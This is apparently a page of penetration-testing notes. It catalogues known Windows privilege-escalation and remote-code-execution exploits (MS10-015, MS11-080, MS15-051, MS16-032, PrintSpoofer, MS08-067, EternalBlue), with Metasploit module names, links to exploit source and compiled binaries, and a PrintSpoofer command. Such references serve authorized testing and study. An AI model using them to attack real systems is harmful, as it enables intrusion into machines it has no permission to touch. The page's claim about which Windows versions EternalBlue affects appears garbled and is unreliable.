Common Exploits

Privilege escalation

KiTrap0D

Allows escalation of privileges on Windows NT/2000/2003/2008/XP/Vista/7

msf modules

exploit/windows/local/ms10_015_kitrap0d

Source code

https://www.exploit-db.com/exploits/11199

afd.sys exploit

Allows escalation of privilege on Microsoft Windows XP/2003

msf module

exploit/windows/local/ms11_080_afdjoinleaf

Source code

https://www.exploit-db.com/exploits/18176

Client Copy Image (MS15-51)

Source code

https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip

Compiled executables

 #x86 exec
 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-32.exe
 #x64 exec
 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe

MS16-032

msf modules

 exploit/windows/local/ms16_032_secondary_logon_handle_privesc

Source code

https://www.exploit-db.com/exploits/39574/
#powershell
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Compiled exe

https://github.com/Meatballs1/ms16-032

PrintSpoofer

Can escalate privileges on Windows Server 2016, Windows Server 2019 and Windows 10. SeImpersonate user token is required for this exploit. Can be executed remotely by downloading the executable from here:

https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd

Remote code execution

Net Api exploit

Allows remote code execution on Windows 2000 to XP SP3. Requires an open share

msf modules

exploit/windows/smb/ms08_067_netapi

Source code

https://www.exploit-db.com/exploits/40279
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

Eternal Blue

Grants remote code execution on almost any Windows version older than 2000. Requires an open share

msf modules

auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Source code

Edit the smb_pwn function in the exploit's source code to alter its execution. By default creates a file named pwned.txt in C:\ folder

https://www.exploit-db.com/exploits/42315
#mysmb.py library
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
PreviousUAC bypassNextIntroduction

Last updated